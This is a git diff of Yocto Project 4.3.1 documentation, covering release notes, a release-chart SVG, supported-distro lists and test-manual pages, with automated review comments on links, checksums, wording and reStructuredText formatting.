+- patchtest: fix lic_files_chksum test regex
+- patchtest: make pylint tests compatible with 3.x
+- patchtest: reduce checksum test output length
+- patchtest: remove test for CVE tag in mbox
+- patchtest: remove unused imports
+- patchtest: rework license checksum tests
+- patchtest: shorten test result outputs
+- patchtest: simplify test directory structure
+- patchtest: skip merge test if not targeting master
+- patchtest: test regardless of mergeability
+- perl: fix intermittent test failure
+- poky.conf: bump version for 4.3.1 release
+- profile-manual: aesthetic cleanups
+- ref-manual: Add documentation for the unimplemented-ptest QA warning
+- ref-manual: Fix :term:`PACKAGECONFIG` term and add an example
+- ref-manual: Warn about :term:`COMPATIBLE_MACHINE` skipping native recipes
+- ref-manual: add systemd-resolved to distro features
+- ref-manual: classes: explain cml1 class name
+- ref-manual: document :term:`KERNEL_LOCALVERSION`
+- ref-manual: document :term:`KERNEL_STRIP`
+- ref-manual: document :term:`MESON_TARGET`
+- ref-manual: document cargo_c class
+- ref-manual: remove semicolons from ``*PROCESS_COMMAND`` variables
+- ref-manual: update :term:`SDK_NAME` variable documentation
+- ref-manual: variables: add :term:`RECIPE_MAINTAINER`
+- ref-manual: variables: add :term:`RECIPE_SYSROOT` and :term:`RECIPE_SYSROOT_NATIVE`
+- ref-manual: variables: add :term:`TOOLCHAIN_OPTIONS` variable
+- ref-manual: variables: add example for :term:`SYSROOT_DIRS` variable
+- ref-manual: variables: document :term:`OEQA_REPRODUCIBLE_TEST_PACKAGE`
+- ref-manual: variables: mention new CDN for :term:`SSTATE_MIRRORS`
+- ref-manual: variables: provide no-match example for :term:`COMPATIBLE_MACHINE`
+- ref-manual: variables: remove SERIAL_CONSOLES_CHECK
+- release-notes-4.3: add CVEs, recipe upgrades, license changes, contributors
+- release-notes-4.3: add Repositories / Downloads section
+- release-notes-4.3: feature additions
+- release-notes-4.3: fix some typos
+- release-notes-4.3: move new classes to Rust section
+- release-notes-4.3: remove the Distribution section
+- release-notes-4.3: tweaks to existing text
+- sdk-manual: appendix-obtain: improve and update descriptions
+- test-manual: reproducible-builds: stop mentioning LTO bug
+- vim: Improve locale handling
+- vim: Upgrade to 9.0.2068
+- vim: use upstream generated .po files
+
+
+Known Issues in Yocto-4.3.1
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+- N/A
+
+
+Contributors to Yocto-4.3.1
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+- Alejandro Hernandez Samaniego
+- Alex Stewart
+- Archana Polampalli
+- Arne Schwerdt
+- BELHADJ SALEM Talel
+- Dmitry Baryshkov
+- Eero Aaltonen
+- Joshua Watt
+- Julien Stephan
+- Jérémy Rosen
+- Khem Raj
+- Lee Chee Yang
+- Marta Rybczynska
+- Max Krummenacher
+- Michael Halstead
+- Michael Opdenacker
+- Paul Eggleton
+- Peter Kjellerstedt
+- Peter Marko
+- Quentin Schulz
+- Richard Purdie
+- Robert P. J. Day
+- Ross Burton
+- Rouven Czerwinski
+- Steve Sakoman
+- Trevor Gamblin
+- Wang Mingyu
+- William Lyu
+- Xiangyu Chen
+- luca fancellu
+
+
+Repositories / Downloads for Yocto-4.3.1
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+poky
+
+- Repository Location: :yocto_git:`/poky`
+- Branch: :yocto_git:`nanbield </poky/log/?h=nanbield>`
+- Tag: :yocto_git:`yocto-4.3.1 </poky/log/?h=yocto-4.3.1>`
+- Git Revision: :yocto_git:`bf9f2f6f60387b3a7cd570919cef6c4570edcb82 </poky/commit/?id=bf9f2f6f60387b3a7cd570919cef6c4570edcb82>`
+- Release Artefact: poky-bf9f2f6f60387b3a7cd570919cef6c4570edcb82
+- sha: 9b4351159d728fec2b63a50f1ac15edc412e2d726e9180a40afc06051fadb922
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.3.1/poky-bf9f2f6f60387b3a7cd570919cef6c4570edcb82.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.3.1/poky-bf9f2f6f60387b3a7cd570919cef6c4570edcb82.tar.bz2
+
+openembedded-core
+
+- Repository Location: :oe_git:`/openembedded-core`
+- Branch: :oe_git:`nanbield </openembedded-core/log/?h=nanbield>`
+- Tag: :oe_git:`yocto-4.3.1 </openembedded-core/log/?h=yocto-4.3.1>`
+- Git Revision: :oe_git:`cce77e8e79c860f4ef0ac4a86b9375bf87507360 </openembedded-core/commit/?id=cce77e8e79c860f4ef0ac4a86b9375bf87507360>`
+- Release Artefact: oecore-cce77e8e79c860f4ef0ac4a86b9375bf87507360
+- sha: e6cde08e7c549f57a67d833a36cdb942648fba81558dc8b0e65332d2a2c023cc
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.3.1/oecore-cce77e8e79c860f4ef0ac4a86b9375bf87507360.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.3.1/oecore-cce77e8e79c860f4ef0ac4a86b9375bf87507360.tar.bz2
+
+meta-mingw
+
+- Repository Location: :yocto_git:`/meta-mingw`
+- Branch: :yocto_git:`nanbield </meta-mingw/log/?h=nanbield>`
+- Tag: :yocto_git:`yocto-4.3.1 </meta-mingw/log/?h=yocto-4.3.1>`
+- Git Revision: :yocto_git:`49617a253e09baabbf0355bc736122e9549c8ab2 </meta-mingw/commit/?id=49617a253e09baabbf0355bc736122e9549c8ab2>`
+- Release Artefact: meta-mingw-49617a253e09baabbf0355bc736122e9549c8ab2
+- sha: 2225115b73589cdbf1e491115221035c6a61679a92a93b2a3cf761ff87bf4ecc
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.3.1/meta-mingw-49617a253e09baabbf0355bc736122e9549c8ab2.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.3.1/meta-mingw-49617a253e09baabbf0355bc736122e9549c8ab2.tar.bz2
+
+bitbake
+
+- Repository Location: :oe_git:`/bitbake`
+- Branch: :oe_git:`2.6 </bitbake/log/?h=2.6>`
+- Tag: :oe_git:`yocto-4.3.1 </bitbake/log/?h=yocto-4.3.1>`
+- Git Revision: :oe_git:`936fcec41efacc4ce988c81882a9ae6403702bea </bitbake/commit/?id=936fcec41efacc4ce988c81882a9ae6403702bea>`
+- Release Artefact: bitbake-936fcec41efacc4ce988c81882a9ae6403702bea
+- sha: efbdd5fe7f29227a3fd26d6a08a368bf8215083a588b4d23f3adf35044897520
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.3.1/bitbake-936fcec41efacc4ce988c81882a9ae6403702bea.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.3.1/bitbake-936fcec41efacc4ce988c81882a9ae6403702bea.tar.bz2
+
+yocto-docs
+
+- Repository Location: :yocto_git:`/yocto-docs`
+- Branch: :yocto_git:`nanbield </yocto-docs/log/?h=nanbield>`
+- Tag: :yocto_git:`yocto-4.3.1 </yocto-docs/log/?h=yocto-4.3.1>`
+- Git Revision: :yocto_git:`6b98a6164263298648e89b5a5ae1260a58f1bb35 </yocto-docs/commit/?id=6b98a6164263298648e89b5a5ae1260a58f1bb35>`
+
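Review bot: every "Download Locations" entry added in these release-note blocks is a plain http:// URL, and the checksum beside it is labelled only "sha", so the notes neither point at an authenticated download nor say which digest to verify against. Suggest https:// links where the hosts serve them, and naming the algorithm next to each value (the values are 64 hex digits, the length of a SHA-256 digest).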
diff --git a/poky/documentation/ref-manual/svg/releases.svg b/poky/documentation/ref-manual/svg/releases.svg
index 5333498d1f..198d4632b1 100644
--- a/poky/documentation/ref-manual/svg/releases.svg
+++ b/poky/documentation/ref-manual/svg/releases.svg
@@ -404,15 +404,15 @@
guidetolerance="10"
inkscape:pageopacity="0"
inkscape:pageshadow="2"
- inkscape:window-width="1846"
- inkscape:window-height="1016"
+ inkscape:window-width="1920"
+ inkscape:window-height="1043"
id="namedview4"
showgrid="true"
- inkscape:zoom="0.51166405"
- inkscape:cx="-43.974166"
- inkscape:cy="311.72798"
- inkscape:window-x="1994"
- inkscape:window-y="27"
+ inkscape:zoom="1.4472045"
+ inkscape:cx="736.24703"
+ inkscape:cy="312.32629"
+ inkscape:window-x="1728"
+ inkscape:window-y="0"
inkscape:window-maximized="1"
inkscape:current-layer="g10"
inkscape:document-rotation="0"
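Review bot: the attributes changed in this hunk (inkscape:window-width, inkscape:window-height, inkscape:zoom, inkscape:cx, inkscape:cy, inkscape:window-x, inkscape:window-y) are Inkscape view state from the editing session, not part of the drawing. Consider leaving them out of the commit so the diff for releases.svg shows only the changes to the figure.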
@@ -669,28 +669,28 @@
style="font-style:normal;font-variant:normal;font-weight:bold;font-stretch:normal;font-size:13.3333px;font-family:'Liberation Sans';-inkscape-font-specification:'Liberation Sans Bold';text-align:center;text-anchor:middle;fill:#fffefe;fill-opacity:1;stroke:none"
id="tspan10317-2-9-1-4">4.2</tspan></text>
<g
- id="g32107">
+ id="g1379">
<rect
- style="opacity:0.75;fill:#333333;fill-opacity:1;fill-rule:evenodd;stroke:none;stroke-width:2;stroke-opacity:1"
- id="rect917-0-0-4-4-9-4-5-3"
- width="140.00014"
+ style="fill:#333333;fill-opacity:1;fill-rule:evenodd;stroke:none;stroke-width:2;stroke-opacity:1"
+ id="rect917-0-0-4-4-9-4-5-38"
+ width="140.00003"
height="45.000004"
- x="1199.9999"
- y="-229.99998"
+ x="1220"
+ y="-230.00005"
ry="2.2558987" />
<text
xml:space="preserve"
style="font-weight:bold;font-size:13.3333px;line-height:125%;font-family:'Nimbus Roman';-inkscape-font-specification:'Nimbus Roman, Bold';letter-spacing:0px;word-spacing:0px;writing-mode:lr-tb;fill:#fffefe;fill-opacity:1;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1"
- x="1247.2329"
+ x="1269.2329"
y="-210.32925"
id="text1185-3-55-4-0-0-0-1-1"><tspan
sodipodi:role="line"
- x="1247.2329"
+ x="1269.2329"
y="-210.32925"
style="font-style:normal;font-variant:normal;font-weight:bold;font-stretch:normal;font-size:13.3333px;font-family:'Liberation Sans';-inkscape-font-specification:'Liberation Sans Bold';text-align:center;text-anchor:middle;fill:#fffefe;fill-opacity:1;stroke:none"
id="tspan957-2-8-6-3-9-7-4">Nanbield</tspan><tspan
sodipodi:role="line"
- x="1247.2329"
+ x="1269.2329"
y="-192.33258"
style="font-style:normal;font-variant:normal;font-weight:bold;font-stretch:normal;font-size:13.3333px;font-family:'Liberation Sans';-inkscape-font-specification:'Liberation Sans Bold';text-align:center;text-anchor:middle;fill:#fffefe;fill-opacity:1;stroke:none"
id="tspan10317-2-9-1-4-6">4.3</tspan></text>
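Review bot: the rect style for the Nanbield box loses "opacity:0.75" in the same hunk that moves the box, and nothing visible here says the opacity change is intended; please confirm it is. The box also moves by 20 units (x 1199.9999 to 1220) while its label moves by 22 (x 1247.2329 to 1269.2329), so check that the text is still centred in the box.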
diff --git a/poky/documentation/ref-manual/system-requirements.rst b/poky/documentation/ref-manual/system-requirements.rst
index e1ff51c859..9dee24a1fa 100644
--- a/poky/documentation/ref-manual/system-requirements.rst
+++ b/poky/documentation/ref-manual/system-requirements.rst
@@ -62,8 +62,6 @@ supported on the following distributions:
- Ubuntu 22.04 (LTS)
-- Fedora 37
-
- Fedora 38
- CentOS Stream 8
@@ -74,19 +72,18 @@ supported on the following distributions:
- OpenSUSE Leap 15.4
-- AlmaLinux 8.8
+- AlmaLinux 8
-- AlmaLinux 9.2
+- AlmaLinux 9
-The following distribution versions are still tested (being listed
-in :term:`SANITY_TESTED_DISTROS`), even though the organizations
-publishing them no longer make updates publicly available:
+- Rocky 9
-- Ubuntu 18.04 (LTS)
+The following distribution versions are still tested, even though the
+organizations publishing them no longer make updates publicly available:
-- Ubuntu 22.10
+- Ubuntu 18.04 (LTS)
-- OpenSUSE Leap 15.3
+- Ubuntu 23.04
Note that the Yocto Project doesn't have access to private updates
that some of these versions may have. Therefore, our testing has
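Review bot: the rewritten sentence drops the parenthetical "(being listed in :term:`SANITY_TESTED_DISTROS`)", which tied this list to the variable behind it. If the list and the variable no longer match, say where the tested set is now defined; otherwise keep the :term: reference so readers can check their host against it.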
@@ -95,7 +92,11 @@ limited value if you have access to such updates.
Finally, here are the distribution versions which were previously
tested on former revisions of "&DISTRO_NAME;", but no longer are:
-*This list is currently empty*
+- Ubuntu 22.10
+
+- Fedora 37
+
+- OpenSUSE Leap 15.3
.. note::
diff --git a/poky/documentation/ref-manual/variables.rst b/poky/documentation/ref-manual/variables.rst
index 12889a5085..b394d31099 100644
--- a/poky/documentation/ref-manual/variables.rst
+++ b/poky/documentation/ref-manual/variables.rst
@@ -5347,9 +5347,8 @@ system and gives an overview of their function and contents.
:term:`PREMIRRORS`, the upstream source, and then
locations specified by :term:`MIRRORS` in that order.
- Assuming your distribution (:term:`DISTRO`) is "poky",
- the default value for :term:`MIRRORS` is defined in the
- ``conf/distro/poky.conf`` file in the ``meta-poky`` Git repository.
+ The default value for :term:`MIRRORS` is defined in the
+ ``meta/classes-global/mirrors.bbclass`` file in the core metadata layer.
:term:`MLPREFIX`
Specifies a prefix has been added to :term:`PN` to create a
@@ -6647,9 +6646,8 @@ system and gives an overview of their function and contents.
source, and then locations specified by
:term:`MIRRORS` in that order.
- Assuming your distribution (:term:`DISTRO`) is "poky",
- the default value for :term:`PREMIRRORS` is defined in the
- ``conf/distro/poky.conf`` file in the ``meta-poky`` Git repository.
+ The default value for :term:`PREMIRRORS` is defined in the
+ ``meta/classes-global/mirrors.bbclass`` file in the core metadata layer.
Typically, you could add a specific server for the build system to
attempt before any others by adding something like the following to
diff --git a/poky/documentation/test-manual/intro.rst b/poky/documentation/test-manual/intro.rst
index aaf64ae017..c31fd11c7a 100644
--- a/poky/documentation/test-manual/intro.rst
+++ b/poky/documentation/test-manual/intro.rst
@@ -14,15 +14,13 @@ release works as intended. All the project's testing infrastructure and
processes are publicly visible and available so that the community can
see what testing is being performed, how it's being done and the current
status of the tests and the project at any given time. It is intended
-that Other organizations can leverage off the process and testing
+that other organizations can leverage off the process and testing
environment used by the Yocto Project to create their own automated,
production test environment, building upon the foundations from the
project core.
-Currently, the Yocto Project Test Environment Manual has no projected
-release date. This manual is a work-in-progress and is being initially
-loaded with information from the README files and notes from key
-engineers:
+This manual is a work-in-progress and is being initially loaded with
+information from the README files and notes from key engineers:
- *yocto-autobuilder2:* This
:yocto_git:`README.md </yocto-autobuilder2/tree/README.md>`
@@ -39,7 +37,7 @@ engineers:
As a result, it can be used by any Continuous Improvement (CI) system
to run builds, support getting the correct code revisions, configure
builds and layers, run builds, and collect results. The code is
- independent of any CI system, which means the code can work `Buildbot <https://docs.buildbot.net/0.9.15.post1/>`__,
+ independent of any CI system, which means the code can work `Buildbot <https://docs.buildbot.net/current/>`__,
Jenkins, or others. This repository has a branch per release of the
project defining the tests to run on a per release basis.
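Review bot: the changed line still reads "the code can work `Buildbot <...>`__, Jenkins, or others", with no "with" after "work"; since the line is being touched for the URL, fix the sentence as well. The context line above it also expands CI as "Continuous Improvement", where "Continuous Integration" looks intended.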
@@ -54,8 +52,8 @@ the Autobuilder tests if things work. The Autobuilder builds all test
targets and runs all the tests.
The Yocto Project uses now uses standard upstream
-`Buildbot <https://docs.buildbot.net/0.9.15.post1/>`__ (version 9) to
-drive its integration and testing. Buildbot Nine has a plug-in interface
+Buildbot (`version 3.8 <https://docs.buildbot.net/3.8.0/>`__) to
+drive its integration and testing. Buildbot has a plug-in interface
that the Yocto Project customizes using code from the
``yocto-autobuilder2`` repository, adding its own console UI plugin. The
resulting UI plug-in allows you to visualize builds in a way suited to
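Review bot: the context line directly above the change reads "The Yocto Project uses now uses standard upstream", and the rewritten sentence keeps that doubled "uses"; drop one while editing this paragraph. This link is also pinned to https://docs.buildbot.net/3.8.0/ while the Buildbot link changed earlier in this file points at /current/; pick one convention.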
@@ -93,8 +91,8 @@ the following types of tests:
- *Build Testing:* Tests whether specific configurations build by
varying :term:`MACHINE`,
:term:`DISTRO`, other configuration
- options, and the specific target images being built (or world). Used
- to trigger builds of all the different test configurations on the
+ options, and the specific target images being built (or ``world``). This is
+ used to trigger builds of all the different test configurations on the
Autobuilder. Builds usually cover many different targets for
different architectures, machines, and distributions, as well as
different configurations, such as different init systems. The
@@ -120,7 +118,7 @@ the following types of tests:
$ bitbake image -c testsdkext
- The tests utilize the :ref:`ref-classes-testsdk` class and the
+ The tests use the :ref:`ref-classes-testsdk` class and the
``do_testsdkext`` task.
- *Feature Testing:* Various scenario-based tests are run through the
@@ -131,7 +129,7 @@ the following types of tests:
$ bitbake image -c testimage
- The tests utilize the :ref:`ref-classes-testimage`
+ The tests use the :ref:`ref-classes-testimage`
class and the :ref:`ref-tasks-testimage` task.
- *Layer Testing:* The Autobuilder has the possibility to test whether
@@ -151,7 +149,7 @@ the following types of tests:
$ bitbake image -c testsdk
- The tests utilize the :ref:`ref-classes-testsdk` class and
+ The tests use the :ref:`ref-classes-testsdk` class and
the ``do_testsdk`` task.
- *Unit Testing:* Unit tests on various components of the system run
@@ -190,38 +188,39 @@ Tests map into the codebase as follows:
$ bitbake-selftest -v
To skip tests that access the Internet, use the ``BB_SKIP_NETTESTS``
- variable when running "bitbake-selftest" as follows::
+ variable when running ``bitbake-selftest`` as follows::
$ BB_SKIP_NETTESTS=yes bitbake-selftest
Use this option when you wish to skip tests that access the network,
which are mostly necessary to test the fetcher modules. To specify
individual test modules to run, append the test module name to the
- "bitbake-selftest" command. For example, to specify the tests for the
- bb.data.module, run::
+ ``bitbake-selftest`` command. For example, to specify the tests for
+ ``bb.tests.data.DataExpansions``, run::
- $ bitbake-selftest bb.test.data.module
+ $ bitbake-selftest bb.tests.data.DataExpansions
You can also specify individual tests by defining the full name and module
plus the class path of the test, for example::
- $ bitbake-selftest bb.tests.data.TestOverrides.test_one_override
+ $ bitbake-selftest bb.tests.data.DataExpansions.test_one_var
- The tests are based on `Python
- unittest <https://docs.python.org/3/library/unittest.html>`__.
+ The tests are based on
+ `Python unittest <https://docs.python.org/3/library/unittest.html>`__.
- *oe-selftest:*
- These tests use OE to test the workflows, which include testing
specific features, behaviors of tasks, and API unit tests.
- - The tests can take advantage of parallelism through the "-j"
+ - The tests can take advantage of parallelism through the ``-j``
option, which can specify a number of threads to spread the tests
across. Note that all tests from a given class of tests will run
in the same thread. To parallelize large numbers of tests you can
split the class into multiple units.
- - The tests are based on Python unittest.
+ - The tests are based on
+ `Python unittest <https://docs.python.org/3/library/unittest.html>`__.
- The code for the tests resides in
``meta/lib/oeqa/selftest/cases/``.
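Review bot: the sentence still says to "append the test module name", but the corrected example, bb.tests.data.DataExpansions, names a test class inside the bb.tests.data module. Either reword it to "test module or class name" or use bb.tests.data in the example, so that the following paragraph about individual tests remains the only one that goes below module level.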
@@ -231,18 +230,18 @@ Tests map into the codebase as follows:
$ oe-selftest -a
- To run a specific test, use the following command form where
- testname is the name of the specific test::
+ ``testname`` is the name of the specific test::
$ oe-selftest -r <testname>
- For example, the following command would run the tinfoil
- getVar API test::
+ For example, the following command would run the ``tinfoil``
+ ``getVar`` API test::
$ oe-selftest -r tinfoil.TinfoilTests.test_getvar
It is also possible to run a set
of tests. For example the following command will run all of the
- tinfoil tests::
+ ``tinfoil`` tests::
$ oe-selftest -r tinfoil
@@ -277,7 +276,7 @@ Tests map into the codebase as follows:
- These tests build an extended SDK (eSDK), install that eSDK, and
run tests against the eSDK.
- - The code for these tests resides in ``meta/lib/oeqa/esdk``.
+ - The code for these tests resides in ``meta/lib/oeqa/sdkext/cases/``.
- To run the tests, use the following command form::
@@ -304,13 +303,13 @@ Tests map into the codebase as follows:
Git repository.
Use the ``oe-build-perf-report`` command to generate text reports
- and HTML reports with graphs of the performance data. For
- examples, see
- :yocto_dl:`/releases/yocto/yocto-2.7/testresults/buildperf-centos7/perf-centos7.yoctoproject.org_warrior_20190414204758_0e39202.html`
+ and HTML reports with graphs of the performance data. See
+ :yocto_dl:`html </releases/yocto/yocto-4.3/testresults/buildperf-debian11/perf-debian11_nanbield_20231019191258_15b576c410.html>`
and
- :yocto_dl:`/releases/yocto/yocto-2.7/testresults/buildperf-centos7/perf-centos7.yoctoproject.org_warrior_20190414204758_0e39202.txt`.
+ :yocto_dl:`txt </releases/yocto/yocto-4.3/testresults/buildperf-debian11/perf-debian11_nanbield_20231019191258_15b576c410.txt>`
+ examples.
- - The tests are contained in ``lib/oeqa/buildperf/test_basic.py``.
+ - The tests are contained in ``meta/lib/oeqa/buildperf/test_basic.py``.
Test Examples
=============
@@ -318,16 +317,14 @@ Test Examples
This section provides example tests for each of the tests listed in the
:ref:`test-manual/intro:How Tests Map to Areas of Code` section.
-For oeqa tests, testcases for each area reside in the main test
-directory at ``meta/lib/oeqa/selftest/cases`` directory.
+- ``oe-selftest`` testcases reside in the ``meta/lib/oeqa/selftest/cases`` directory.
-For oe-selftest. bitbake testcases reside in the ``lib/bb/tests/``
-directory.
+- ``bitbake-selftest`` testcases reside in the ``bitbake/lib/bb/tests/`` directory.
``bitbake-selftest``
--------------------
-A simple test example from ``lib/bb/tests/data.py`` is::
+A simple test example from ``bitbake/lib/bb/tests/data.py`` is::
class DataExpansions(unittest.TestCase):
def setUp(self):
@@ -340,21 +337,24 @@ A simple test example from ``lib/bb/tests/data.py`` is::
val = self.d.expand("${foo}")
self.assertEqual(str(val), "value_of_foo")
-In this example, a ``DataExpansions`` class of tests is created,
-derived from standard Python unittest. The class has a common ``setUp``
-function which is shared by all the tests in the class. A simple test is
-then added to test that when a variable is expanded, the correct value
-is found.
+In this example, a ``DataExpansions`` class of tests is created, derived from
+standard `Python unittest <https://docs.python.org/3/library/unittest.html>`__.
+The class has a common ``setUp`` function which is shared by all the tests in
+the class. A simple test is then added to test that when a variable is
+expanded, the correct value is found.
-BitBake selftests are straightforward Python unittest. Refer to the
-Python unittest documentation for additional information on writing
-these tests at: https://docs.python.org/3/library/unittest.html.
+BitBake selftests are straightforward
+`Python unittest <https://docs.python.org/3/library/unittest.html>`__.
+Refer to the `Python unittest documentation
+<https://docs.python.org/3/library/unittest.html>`__ for additional information
+on writing such tests.
``oe-selftest``
---------------
These tests are more complex due to the setup required behind the scenes
-for full builds. Rather than directly using Python's unittest, the code
+for full builds. Rather than directly using `Python unittest
+<https://docs.python.org/3/library/unittest.html>`__, the code
wraps most of the standard objects. The tests can be simple, such as
testing a command from within the OE build environment using the
following example::
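Review bot: the second added paragraph links the same https://docs.python.org/3/library/unittest.html target twice in consecutive sentences ("Python unittest" and "Python unittest documentation"), and the paragraphs before and after it link it again. One link per section is enough; the remaining mentions can be plain text.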
@@ -391,14 +391,14 @@ so tests within a given test class should always run in the same build,
while tests in different classes or modules may be split into different
builds. There is no data store available for these tests since the tests
launch the ``bitbake`` command and exist outside of its context. As a
-result, common bitbake library functions (bb.\*) are also unavailable.
+result, common BitBake library functions (``bb.\*``) are also unavailable.
``testimage``
-------------
These tests are run once an image is up and running, either on target
hardware or under QEMU. As a result, they are assumed to be running in a
-target image environment, as opposed to a host build environment. A
+target image environment, as opposed to in a host build environment. A
simple example from ``meta/lib/oeqa/runtime/cases/python.py`` contains
the following::
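Review bot: in the added ``bb.\*`` the backslash now sits inside an inline literal, where reStructuredText does not process escapes, so the rendered page will show the backslash. Write ``bb.*`` instead.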
@@ -413,19 +413,19 @@ the following::
In this example, the ``OERuntimeTestCase`` class wraps
``unittest.TestCase``. Within the test, ``self.target`` represents the
-target system, where commands can be run on it using the ``run()``
+target system, where commands can be run using the ``run()``
method.
-To ensure certain test or package dependencies are met, you can use the
+To ensure certain tests or package dependencies are met, you can use the
``OETestDepends`` and ``OEHasPackage`` decorators. For example, the test
-in this example would only make sense if python3-core is installed in
+in this example would only make sense if ``python3-core`` is installed in
the image.
``testsdk_ext``
---------------
These tests are run against built extensible SDKs (eSDKs). The tests can
-assume that the eSDK environment has already been setup. An example from
+assume that the eSDK environment has already been set up. An example from
``meta/lib/oeqa/sdk/cases/devtool.py`` contains the following::
class DevtoolTest(OESDKExtTestCase):
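Review bot: the testsdk_ext paragraph edited here still cites meta/lib/oeqa/sdk/cases/devtool.py, while an earlier hunk in this file places the eSDK tests in meta/lib/oeqa/sdkext/cases/ and the example class derives from OESDKExtTestCase; please check the path. Separately, changing "certain test or package dependencies" to "certain tests or package dependencies" alters the meaning: the original matched the OETestDepends and OEHasPackage decorators named in the same sentence.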
@@ -472,9 +472,9 @@ following::
output = self._run(cmd)
self.assertEqual(output, "Hello, world\n")
-In this example, if nativesdk-python3-core has been installed into the SDK, the code runs
-the python3 interpreter with a basic command to check it is working
-correctly. The test would only run if Python3 is installed in the SDK.
+In this example, if ``nativesdk-python3-core`` has been installed into the SDK,
+the code runs the ``python3`` interpreter with a basic command to check it is
+working correctly. The test would only run if Python3 is installed in the SDK.
``oe-build-perf-test``
----------------------
@@ -520,7 +520,7 @@ an isolated directory.
This can delete files from :term:`SSTATE_DIR` which would potentially break
other builds running in parallel. If this is required, :term:`SSTATE_DIR` must
-be set to an isolated directory. Alternatively, you can use the "-f"
+be set to an isolated directory. Alternatively, you can use the ``-f``
option with the ``bitbake`` command to "taint" tasks by changing the
sstate checksums to ensure sstate cache items will not be reused.
diff --git a/poky/documentation/test-manual/test-process.rst b/poky/documentation/test-manual/test-process.rst
index 4c3b32bfea..7bec5ba828 100644
--- a/poky/documentation/test-manual/test-process.rst
+++ b/poky/documentation/test-manual/test-process.rst
@@ -20,8 +20,8 @@ helps review and test patches and this is his testing tree).
We have two broad categories of test builds, including "full" and
"quick". On the Autobuilder, these can be seen as "a-quick" and
"a-full", simply for ease of sorting in the UI. Use our Autobuilder
-console view to see where me manage most test-related items, available
-at: :yocto_ab:`/typhoon/#/console`.
+:yocto_ab:`console view </typhoon/#/console>` to see where we manage most
+test-related items.
Builds are triggered manually when the test branches are ready. The
builds are monitored by the SWAT team. For additional information, see
@@ -34,24 +34,21 @@ which the result was required.
The Autobuilder does build the ``master`` branch once daily for several
reasons, in particular, to ensure the current ``master`` branch does
-build, but also to keep ``yocto-testresults``
-(:yocto_git:`/yocto-testresults/`),
-buildhistory
-(:yocto_git:`/poky-buildhistory/`), and
-our sstate up to date. On the weekend, there is a master-next build
+build, but also to keep (:yocto_git:`yocto-testresults </yocto-testresults/>`),
+(:yocto_git:`buildhistory </poky-buildhistory/>`), and
+our sstate up to date. On the weekend, there is a ``master-next`` build
instead to ensure the test results are updated for the less frequently
run targets.
-Performance builds (buildperf-\* targets in the console) are triggered
+Performance builds (``buildperf-\*`` targets in the console) are triggered
separately every six hours and automatically push their results to the
-buildstats repository at:
-:yocto_git:`/yocto-buildstats/`.
+:yocto_git:`buildstats </yocto-buildstats/>` repository.
-The 'quick' targets have been selected to be the ones which catch the
-most failures or give the most valuable data. We run 'fast' ptests in
+The "quick" targets have been selected to be the ones which catch the
+most failures or give the most valuable data. We run "fast" ptests in
this case for example but not the ones which take a long time. The quick
-target doesn't include \*-lsb builds for all architectures, some world
-builds and doesn't trigger performance tests or ltp testing. The full
+target doesn't include ``\*-lsb`` builds for all architectures, some ``world``
+builds and doesn't trigger performance tests or ``ltp`` testing. The full
build includes all these things and is slower but more comprehensive.
Release Builds
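Review bot: after the names moved into the link text the parentheses were left behind, so the sentence now reads "to keep (yocto-testresults), (buildhistory), and our sstate up to date"; drop them. The added ``buildperf-\*`` and ``\*-lsb`` literals will also render with a visible backslash, because escapes are not processed inside an inline literal.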
@@ -67,12 +64,12 @@ that in :ref:`test-manual/test-process:day to day development`, in that the
a-full target of the Autobuilder is used but in addition the form is
configured to generate and publish artifacts and the milestone number,
version, release candidate number and other information is entered. The
-box to "generate an email to QA"is also checked.
+box to "generate an email to QA" is also checked.
-When the build completes, an email is sent out using the send-qa-email
-script in the ``yocto-autobuilder-helper`` repository to the list of
-people configured for that release. Release builds are placed into a
-directory in https://autobuilder.yocto.io/pub/releases on the
+When the build completes, an email is sent out using the ``send-qa-email``
+script in the :yocto_git:`yocto-autobuilder-helper </yocto-autobuilder-helper>`
+repository to the list of people configured for that release. Release builds
+are placed into a directory in https://autobuilder.yocto.io/pub/releases on the
Autobuilder which is included in the email. The process from here is
more manual and control is effectively passed to release engineering.
The next steps include:
@@ -80,14 +77,15 @@ The next steps include:
- QA teams respond to the email saying which tests they plan to run and
when the results will be available.
-- QA teams run their tests and share their results in the yocto-
- testresults-contrib repository, along with a summary of their
- findings.
+- QA teams run their tests and share their results in the
+ :yocto_git:`yocto-testresults-contrib </yocto-testresults-contrib>`
+ repository, along with a summary of their findings.
- Release engineering prepare the release as per their process.
- Test results from the QA teams are included into the release in
- separate directories and also uploaded to the yocto-testresults
+ separate directories and also uploaded to the
+ :yocto_git:`yocto-testresults </yocto-testresults>`
repository alongside the other test results for the given revision.
- The QA report in the final release is regenerated using resulttool to
diff --git a/poky/documentation/test-manual/understand-autobuilder.rst b/poky/documentation/test-manual/understand-autobuilder.rst
index 7a6cb2443b..6b4fab4f0b 100644
--- a/poky/documentation/test-manual/understand-autobuilder.rst
+++ b/poky/documentation/test-manual/understand-autobuilder.rst
@@ -9,8 +9,8 @@ Execution Flow within the Autobuilder
The "a-full" and "a-quick" targets are the usual entry points into the
Autobuilder and it makes sense to follow the process through the system
-starting there. This is best visualized from the Autobuilder Console
-view (:yocto_ab:`/typhoon/#/console`).
+starting there. This is best visualized from the :yocto_ab:`Autobuilder
+Console view </typhoon/#/console>`.
Each item along the top of that view represents some "target build" and
these targets are all run in parallel. The 'full' build will trigger the
@@ -18,9 +18,9 @@ majority of them, the "quick" build will trigger some subset of them.
The Autobuilder effectively runs whichever configuration is defined for
each of those targets on a separate buildbot worker. To understand the
configuration, you need to look at the entry on ``config.json`` file
-within the ``yocto-autobuilder-helper`` repository. The targets are
-defined in the ‘overrides' section, a quick example could be qemux86-64
-which looks like::
